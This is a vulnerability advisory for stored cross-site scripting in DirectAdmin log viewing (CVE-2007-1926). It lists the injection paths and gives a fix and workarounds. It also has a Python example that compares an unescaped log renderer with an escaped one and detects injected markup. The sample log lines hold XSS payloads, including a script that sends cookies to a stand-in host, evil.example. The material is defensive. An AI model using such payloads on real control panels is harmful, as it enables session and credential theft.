PT-2007-3271 · Directadmin · Directadmin

Published

2007-04-10

·

Updated

2025-12-16

·

CVE-2007-1926

CVSS v2.0

6.8

Medium

Vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: DirectAdmin versions prior to 1.293
Description: DirectAdmin displays a number of system and service log files in the browser, and versions before 1.293 render log entries without HTML-encoding them. Any attacker-controlled string that a service writes to one of those logs therefore becomes stored cross-site scripting: the script runs in the browser of the administrator or user who later opens the log through the control panel. Three injection paths are covered by CVE-2007-1926. Remote authenticated users can plant web script or HTML through HTTP or FTP requests that are recorded in logs such as /var/log/directadmin/security.log. Context-dependent attackers can write script or HTML into /var/log/messages from a PHP script that invokes /usr/bin/logger, and local users can do the same by running /usr/bin/logger from the command line. Unauthenticated remote attackers can inject script or HTML through requests that are logged by the web, mail and FTP services, including /var/log/exim/rejectlog, /var/log/exim/mainlog, /var/log/proftpd/auth.log, /var/log/httpd/error_log, /var/log/httpd/access_log, /var/log/directadmin/error.log and /var/log/directadmin/security.log. Request lines, User-Agent and Referer headers, FTP user names and SMTP sender addresses are all written to these files verbatim, so no authentication is needed for the web, mail and FTP paths.
Recommendations: For versions prior to 1.293, update to version 1.293 or later, which encodes log content before displaying it; this is the only complete fix. Until the update is applied, the following workarounds reduce exposure but do not remove the flaw: restrict which accounts can open log files through the control panel, avoid viewing logs in the panel from a browser session that holds DirectAdmin credentials, and prevent PHP scripts and shell users from invoking /usr/bin/logger. Do not pass user-supplied data to the logger command until the issue is resolved.
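The following Python example, added here to illustrate the advisory and not taken from DirectAdmin or from the original page, contrasts a log viewer that drops log text into HTML unescaped with one that encodes it, and adds a small check that flags log lines already carrying markup. The log lines, the hostnames and the IP addresses are constructed for the example; DirectAdmin's own viewer is written in C++ and is not reproduced here.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample access_log lines (not from any real system). Line 2 carries
# the payload in the request path; line 3 carries it percent-encoded in the path
# and verbatim in the User-Agent, which combined-format logs record unchanged.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Apr/2007:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Apr/2007:12:00:02 +0000] "GET /<script>document.location='
    '\'http://evil.example/?c=\'+document.cookie</script> HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Apr/2007:12:00:03 +0000] "GET /%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E '
    'HTTP/1.1" 404 210 "-" "<img src=x onerror=alert(document.domain)>"',
]

# Opening or closing tag, javascript: URL, or an inline event handler attribute.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-zA-Z!]|javascript\s*:|on[a-z]+\s*=', re.IGNORECASE)


def render_log_vulnerable(lines):
    """Pre-1.293 behaviour: the raw log text is placed inside the page, so any
    tag an attacker managed to get logged is parsed by the viewer's browser."""
    return "<pre>\n" + "\n".join(lines) + "\n</pre>"


def render_log_fixed(lines):
    """Encode each line on output; the browser then shows the payload as text.
    Escaping at display time is the fix, because the log file itself must keep
    the attacker's bytes unchanged for forensic purposes."""
    return "<pre>\n" + "\n".join(html.escape(line, quote=True) for line in lines) + "\n</pre>"


def find_injected_markup(lines):
    """Return (1-based line number, matched fragment) for lines containing HTML
    or script fragments, checking both the raw line and its percent-decoded
    form so encoded payloads are not missed. Expect some false positives on
    logs that legitimately contain '<' or 'on...=' text."""
    hits = []
    for n, line in enumerate(lines, 1):
        for candidate in (line, unquote(line)):
            m = MARKUP_RE.search(candidate)
            if m:
                hits.append((n, m.group(0)))
                break
    return hits


def contains_live_tag(rendered):
    """True if the rendered HTML still contains an unescaped script or img tag."""
    return bool(re.search(r'<(script|img)\b', rendered, re.IGNORECASE))


# Mapping used when user input must be logged before the fix is deployed: the
# characters that matter to an HTML parser, plus CR/LF to stop log forging.
_LOG_ENCODE = {'<': '%3C', '>': '%3E', '&': '%26', '"': '%22',
               "'": '%27', '\r': '%0D', '\n': '%0A'}


def sanitize_before_logging(value):
    """Percent-encode the dangerous characters so the stored line is inert even
    in an unpatched viewer. This is a stop-gap for code you control (for
    example a PHP script calling /usr/bin/logger), not a replacement for 1.293."""
    return ''.join(_LOG_ENCODE.get(ch, ch) for ch in value)


if __name__ == "__main__":
    for n, fragment in find_injected_markup(SAMPLE_ACCESS_LOG):
        print(f"line {n}: markup fragment {fragment!r}")
    print("vulnerable viewer executes payload:",
          contains_live_tag(render_log_vulnerable(SAMPLE_ACCESS_LOG)))
    print("fixed viewer executes payload:",
          contains_live_tag(render_log_fixed(SAMPLE_ACCESS_LOG)))
    print(sanitize_before_logging("<script>alert(1)</script>\n"))
```

Running the module reports lines 2 and 3 as carrying markup, shows that the unescaped renderer leaves a live script tag while the escaped one does not, and prints the encoded form a logging stop-gap would store. The detector is useful for an incident responder checking whether anyone has already seeded the logs of an unpatched host, which the update itself does not tell you.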

Exploit

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2007-1926

Affected Products

Directadmin